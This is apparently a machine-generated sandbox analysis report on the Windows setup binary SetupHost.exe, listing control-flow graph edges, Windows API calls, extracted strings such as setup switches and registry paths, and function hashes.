9aaf91-9aaf93 1450->1463 1456->1385 1457->1456 1485 9aacf2 1459->1485 1486 9aad66-9aad72 1459->1486 1469 9aadbe-9aadc3 1460->1469 1470 9aad8d-9aada5 call 9aa87f 1460->1470 1462->1463 1465 9aaf9c-9aaf9e 1463->1465 1466 9aaf95-9aaf97 call 9b9b21 1463->1466 1476 9aafa0-9aafa2 call 9b9b21 1465->1476 1477 9aafa7-9aafac 1465->1477 1466->1465 1480 9aadc9-9aadcb 1469->1480 1481 9aae4f-9aae67 call 9aa87f 1469->1481 1503 9aadb1-9aadbb 1470->1503 1504 9aada7 1470->1504 1476->1477 1489 9aafae call 9b9b21 1477->1489 1490 9aafb3-9aafb8 1477->1490 1483 9aaddb-9aadf2 call 9a1bc9 1480->1483 1484 9aadcd-9aadd8 call 9b9b21 1480->1484 1512 9aae69 1481->1512 1513 9aae73-9aae78 1481->1513 1516 9aadfe-9aae05 1483->1516 1517 9aadf4 1483->1517 1484->1483 1485->1441 1496 9aad7e-9aad86 1486->1496 1497 9aad74-9aad7b call 9b9b21 1486->1497 1489->1490 1501 9aafba call 9b9b21 1490->1501 1502 9aafbf-9aafc4 1490->1502 1530 9aacc4 1491->1530 1492->1447 1496->1460 1497->1496 1501->1502 1508 9aafcb-9aafd2 call a0f390 1502->1508 1509 9aafc6 call 9b9b21 1502->1509 1503->1469 1504->1503 1509->1508 1512->1513 1518 9aae7a 1513->1518 1519 9aae7c-9aae94 call 9aa87f 1513->1519 1521 9aae0a-9aae22 call 9aa87f 1516->1521 1522 9aae07 1516->1522 1517->1516 1518->1519 1531 9aaea0-9aaea5 1519->1531 1532 9aae96 1519->1532 1535 9aae2e-9aae3d 1521->1535 1536 9aae24 1521->1536 1522->1521 1530->1492 1533 9aaea9-9aaec1 call 9aa87f 1531->1533 1534 9aaea7 1531->1534 1532->1531 1542 9aaecd-9aaee3 call 9aa988 1533->1542 1543 9aaec3 1533->1543 1534->1533 1538 9aae3f-9aae41 call 9b9b21 1535->1538 1539 9aae46-9aae4c 1535->1539 1536->1535 1538->1539 1539->1481 1546 9aaeef-9aaef5 1542->1546 1547 9aaee5 1542->1547 1543->1542 1548 9aaef7-9aaefa 1546->1548 1549 9aaf24-9aaf3e call 9aa87f 1546->1549 1547->1546 1551 9aaf4a-9aaf6b 1548->1551 1552 9aaefc-9aaf18 call 9aa87f 1548->1552 1549->1551 1555 9aaf40 1549->1555 1551->1406 1552->1551 1557 9aaf1a 1552->1557 1555->1551 1557->1549
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009AAA24
                                                                                                                                                                                                                  • Part of subcall function 009AA87F: __EH_prolog3.LIBCMT ref: 009AA886
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: GetProcessHeap.KERNEL32(00000000,?,009A7D2F), ref: 009B9B2B
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: HeapFree.KERNEL32(00000000), ref: 009B9B32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3Heap$FreeProcess
                                                                                                                                                                                                                • String ID: /AzureHost$/Boot$/ClientId %s$/CopyLogs "%s"$/ExpressPackage$/FlightData %s$/Media$/Package$/Quiet$/Recovery$/ReportId %s$/RollbackSys$/RollbackUser$/RunRollbackScript$/Success$/Update$CSetupHost::CreatePostRebootArgs$SetupHost: Unexpected scenario - defaulting postoobe/rollback commands!$W
                                                                                                                                                                                                                • API String ID: 2588364637-2629692655
                                                                                                                                                                                                                • Opcode ID: 47aa00bc385fa63428d77c2956dc4b3d1f415380238c367b4366d0e9d5094200
                                                                                                                                                                                                                • Instruction ID: e5d8dce6925a6023b4c8a0d18e627066ded088916c800cd188baf149153dd5ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47aa00bc385fa63428d77c2956dc4b3d1f415380238c367b4366d0e9d5094200
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA024E70B0021A9BDF15DFA8D991BBEB7B9AF45710F104029E905EB381EB74DD01CBA6
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 009FDADD
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009FDB2A
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 009FDAEB
                                                                                                                                                                                                                  • Part of subcall function 00A0086C: GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 00A008BE
                                                                                                                                                                                                                  • Part of subcall function 00A0086C: memset.MSVCRT ref: 00A008E3
                                                                                                                                                                                                                  • Part of subcall function 00A0086C: GetProcessHeap.KERNEL32(00000000,?), ref: 00A0092F
                                                                                                                                                                                                                  • Part of subcall function 00A0086C: HeapAlloc.KERNEL32(00000000), ref: 00A00936
                                                                                                                                                                                                                  • Part of subcall function 00A0086C: wcsrchr.MSVCRT ref: 00A0099E
                                                                                                                                                                                                                • memset.MSVCRT ref: 009FDB44
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009FDB77
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 009FDB85
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 009FDBA0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • %hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d, xrefs: 009FDC0C
                                                                                                                                                                                                                • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 009FDAFA, 009FDBAF, 009FDBFB, 009FDC49
                                                                                                                                                                                                                • CSDBuildNumber, xrefs: 009FDB6C
                                                                                                                                                                                                                • %hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ)., xrefs: 009FDC59
                                                                                                                                                                                                                • pGetHostCSDBuildNumber, xrefs: 009FDAF5, 009FDBAA, 009FDBF6, 009FDC44
                                                                                                                                                                                                                • %hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d, xrefs: 009FDB0B
                                                                                                                                                                                                                • pGetHostCSDBuildNumber, xrefs: 009FDB06, 009FDBBA, 009FDC07, 009FDC54
                                                                                                                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 009FDAD1
                                                                                                                                                                                                                • %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0, xrefs: 009FDBBF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heapmemset$AllocCloseOpenProcessQueryValuewcsrchr
                                                                                                                                                                                                                • String ID: %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0$%hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d$%hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d$%hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ).$CSDBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$pGetHostCSDBuildNumber$pGetHostCSDBuildNumber
                                                                                                                                                                                                                • API String ID: 3006269326-936426326
                                                                                                                                                                                                                • Opcode ID: a0234312fb2af30055b8650bf091249937a188e57a5a2858def1c53d28a03770
                                                                                                                                                                                                                • Instruction ID: 3e0c6313092e677dbff559ab30f1fbb136882a3d1649b7c15adc372a1b287d6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0234312fb2af30055b8650bf091249937a188e57a5a2858def1c53d28a03770
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB41DA716C531CBFDF11ABA89C8AFFF376CDBA470AF004458F505A5191C5B14D4187A1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1587 9a2f00-9a2f57 GetProcessHeap HeapAlloc 1588 9a2f59-9a2f88 UuidCreate call 9bcd57 1587->1588 1589 9a2f91-9a2f99 1587->1589 1596 9a2f8d 1588->1596 1590 9a2f9b-9a2fa0 1589->1590 1591 9a2fb0-9a2fbc 1589->1591 1593 9a2fa2 call 9b9d84 1590->1593 1594 9a2fbe-9a2fcd call 9b9c14 1591->1594 1595 9a2fdd-9a2fe9 call 9bb2c2 1591->1595 1600 9a2fa7-9a2fab 1593->1600 1604 9a2fcf-9a2fd1 1594->1604 1605 9a2fd3-9a2fdb 1594->1605 1606 9a2feb-9a2fed call 9b9d84 1595->1606 1607 9a2ff2-9a2ffb call 9b9d9c 1595->1607 1596->1589 1603 9a31e0-9a31e9 call 9b9d9c 1600->1603 1617 9a31eb-9a31ed call 9b9b21 1603->1617 1618 9a31f2-9a31fa 1603->1618 1604->1593 1610 9a303d-9a3043 1605->1610 1606->1607 1607->1604 1616 9a2ffd-9a3004 call 9bb0b6 1607->1616 1614 9a30a4-9a30b2 1610->1614 1615 9a3045-9a3061 call 9b9d9c call 9b9975 1610->1615 1619 9a30d9-9a30f7 memset call 9a23d2 1614->1619 1620 9a30b4-9a30d4 memset call 9a241d call 9a258d 1614->1620 1615->1604 1642 9a3067-9a3070 1615->1642 1630 9a3009-9a300d 1616->1630 1617->1618 1625 9a320b-9a3211 1618->1625 1626 9a31fc-9a3205 GetProcessHeap HeapFree 1618->1626 1635 9a30f9-9a310b call 9b9d84 1619->1635 1636 9a3110-9a3123 call 9a217c 1619->1636 1620->1619 1631 9a3222-9a3228 1625->1631 1632 9a3213-9a321c GetProcessHeap HeapFree 1625->1632 1626->1625 1630->1604 1637 9a300f-9a3014 1630->1637 1638 9a322a-9a3233 GetProcessHeap HeapFree 1631->1638 1639 9a3239-9a323f 1631->1639 1632->1631 1635->1600 1658 9a312f-9a3147 call 9b986b 1636->1658 1659 9a3125 1636->1659 1637->1614 1645 9a301a-9a3033 call 9bb1d4 1637->1645 1638->1639 1646 9a3250-9a3252 1639->1646 1647 9a3241-9a324a GetProcessHeap HeapFree 1639->1647 1650 9a3079 call 9a217c 1642->1650 1651 9a3072-9a3077 call 9a1fc3 1642->1651 1645->1604 1664 9a3035 1645->1664 1648 9a3263-9a3279 call a0ea60 1646->1648 1649 9a3254-9a325d GetProcessHeap HeapFree 1646->1649 1647->1646 1649->1648 1663 9a307e-9a3084 1650->1663 1651->1663 1670 9a3149-9a3158 call 9b9d84 1658->1670 1671 9a315d-9a315f 1658->1671 1659->1658 1663->1590 1666 9a308a-9a308c 1663->1666 1664->1610 1668 9a308e-9a309e GetProcessHeap HeapFree 1666->1668 1669 9a30a2 1666->1669 1668->1669 1669->1614 1670->1600 1672 9a316d-9a317e call 9b9c14 1671->1672 1673 9a3161-9a3168 call 9b9b21 1671->1673 1672->1670 1680 9a3180-9a3186 call 9b8b23 1672->1680 1673->1672 1682 9a318b-9a3193 1680->1682 1683 9a31a6-9a31dc call 9aee5d * 2 1682->1683 1684 9a3195-9a31a4 call 9b9d84 1682->1684 1683->1603 1684->1603
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000090), ref: 009A2F44
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009A2F4B
                                                                                                                                                                                                                • UuidCreate.RPCRT4(?), ref: 009A2F6F
                                                                                                                                                                                                                  • Part of subcall function 009BCD57: memset.MSVCRT ref: 009BCD9B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,CorrelationVector,?), ref: 009A3091
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A3098
                                                                                                                                                                                                                • memset.MSVCRT ref: 009A30BC
                                                                                                                                                                                                                • memset.MSVCRT ref: 009A30E1
                                                                                                                                                                                                                  • Part of subcall function 009B986B: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 009B995F
                                                                                                                                                                                                                  • Part of subcall function 009B986B: HeapFree.KERNEL32(00000000), ref: 009B9966
                                                                                                                                                                                                                  • Part of subcall function 009AEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,009BB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 009AEE6B
                                                                                                                                                                                                                  • Part of subcall function 009AEE5D: HeapFree.KERNEL32(00000000), ref: 009AEE72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009A31FE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A3205
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009A3215
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A321C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009A322C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A3233
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009A3243
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A324A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A3256
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009A325D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$memset$AllocCreateUuid
                                                                                                                                                                                                                • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                                                                                                                • API String ID: 858379666-2351024219
                                                                                                                                                                                                                • Opcode ID: 108a94f27634c434fd231615e4afa35c0d58b3f1540640c10631b1444c567255
                                                                                                                                                                                                                • Instruction ID: c201b44786680ac4bc8835d1ba34214807b59ca9345ccdf432a8e08aa544658e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 108a94f27634c434fd231615e4afa35c0d58b3f1540640c10631b1444c567255
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFA18F716083029FC710EFA8C885BAFBBF8AFD9744F00492DF94587281DB74DA058B92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wfopen.MSVCRT ref: 00A07835
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000200), ref: 00A07859
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A07860
                                                                                                                                                                                                                • fgetws.MSVCRT ref: 00A0787B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 00A078C4
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 00A078CB
                                                                                                                                                                                                                • fgetws.MSVCRT ref: 00A078F6
                                                                                                                                                                                                                • feof.MSVCRT ref: 00A07906
                                                                                                                                                                                                                • iswctype.MSVCRT(?,00000008), ref: 00A0793D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A07968
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0796F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A0797B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A07982
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A07998
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A0799F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A079AA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A079B1
                                                                                                                                                                                                                • swscanf_s.MSVCRT ref: 00A079D9
                                                                                                                                                                                                                  • Part of subcall function 00A075AB: _wcsicmp.MSVCRT ref: 00A075DB
                                                                                                                                                                                                                  • Part of subcall function 00A075AB: _wcsicmp.MSVCRT ref: 00A07622
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free_wcsicmpfgetws$_wfopenfeofiswctypeswscanf_s
                                                                                                                                                                                                                • String ID: %s %[^]
                                                                                                                                                                                                                • API String ID: 1979924226-2460127861
                                                                                                                                                                                                                • Opcode ID: 39c3b852a2c8e16d4c3a032497291918b9d9d2afd8281e14c35dc723711b1c8a
                                                                                                                                                                                                                • Instruction ID: bfa195a611ab78ec6a32e1bf770dc54a38d124329088bf5d08f6e1e5558cc957
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c3b852a2c8e16d4c3a032497291918b9d9d2afd8281e14c35dc723711b1c8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14611D71E08219ABDF15DFE5EC88AEEBBB9FF48350F148019E805E7290D774A941CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 00A008BE
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A008E3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A0092F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A00936
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 00A0099E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 00A00A37
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A00A3E
                                                                                                                                                                                                                • TlsGetValue.KERNEL32(?,?), ref: 00A00A4A
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(?,C:\$Windows.~WS\Sources\SetupHost.Exe,?,?,?,?), ref: 00A00A98
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A00AE6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A00AED
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00A00AFF
                                                                                                                                                                                                                • RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00A00B17
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 00A00B21
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ErrorFreeLast$AllocCurrentExceptionExitRaiseThreadValuememsetwcsrchr
                                                                                                                                                                                                                • String ID: <unknown>$<unnamed>$C:\$Windows.~WS\Sources\SetupHost.Exe$Def
                                                                                                                                                                                                                • API String ID: 2945306065-2549979051
                                                                                                                                                                                                                • Opcode ID: 39a038c335384c8424761bf7b3b9b012a92e0d48789b5c07d07a358bd5d9d067
                                                                                                                                                                                                                • Instruction ID: 6bfe436b591368deb589f9c8d4e0192b35cbb83263853e0d7663c1a6cd07c5e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a038c335384c8424761bf7b3b9b012a92e0d48789b5c07d07a358bd5d9d067
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1817A72608305AFDB10DFA4EC45FAABBE5AF88750F04852CF949D72A1D770D942CB92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ImpersonateLoggedOnUser.ADVAPI32(00000001,00000001,00000000,00000000,00000001,00000000), ref: 00A0906B
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001), ref: 00A09075
                                                                                                                                                                                                                • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,00000001,00000000), ref: 00A090A4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A090AE
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A090B9
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A090EC
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A0912B
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A0913E
                                                                                                                                                                                                                • WinHttpGetProxyForUrl.WINHTTP(00000000,00000000,?,?), ref: 00A09158
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A091FB
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A09211
                                                                                                                                                                                                                • WinHttpSetOption.WINHTTP(00000000,00000026,?,0000000C), ref: 00A0923C
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A09296
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00A092A9
                                                                                                                                                                                                                • WinHttpGetDefaultProxyConfiguration.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001), ref: 00A092B7
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 00A0937D
                                                                                                                                                                                                                • RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A093A8
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A093B6
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00A093BD
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00A08F42
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3), ref: 00A08F63
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00A08F79
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A08F83
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: CloseHandle.KERNEL32(00000000), ref: 00A08FFE
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSFreeMemory.WTSAPI32(?), ref: 00A0900D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$ErrorGlobalLast$Http$ProxyUser$ActiveCloseConfigConfigurationConsoleCurrentDefaultEnumerateExitHandleImpersonateLoggedMemoryOptionProcessQueryRevertSelfSessionSessionsTokenwcsrchr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1916705276-0
                                                                                                                                                                                                                • Opcode ID: 5a46dbf260f8ea7215bb560e64654f621d5c026d661d08ca172e94db72139803
                                                                                                                                                                                                                • Instruction ID: 886f14d2b4aa6e7e06bd8cabc80e5464c80920c9612cffbce58a121ef16715e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a46dbf260f8ea7215bb560e64654f621d5c026d661d08ca172e94db72139803
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17B1B532A0120AABDF259FB4E8197EFB7B5EF18750F154128D806EB2E2E7319D41CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A09436: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,00A094E2,00000001,00000000,00000001,00000000,00000000), ref: 00A09486
                                                                                                                                                                                                                  • Part of subcall function 00A09436: HeapAlloc.KERNEL32(00000000,?,00A094E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A0948D
                                                                                                                                                                                                                  • Part of subcall function 00A09436: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,00A094E2,00000001,00000000,00000001,00000000,00000000), ref: 00A094B0
                                                                                                                                                                                                                  • Part of subcall function 00A09436: HeapFree.KERNEL32(00000000,?,00A094E2), ref: 00A094B7
                                                                                                                                                                                                                • WinHttpSendRequest.WINHTTP(?,00000000,000000FF,00000000,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 00A094FA
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000,00000000), ref: 00A09504
                                                                                                                                                                                                                • WinHttpReceiveResponse.WINHTTP(?,00000000,?,?,00000000,00000000,00000000), ref: 00A09527
                                                                                                                                                                                                                • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00A0954C
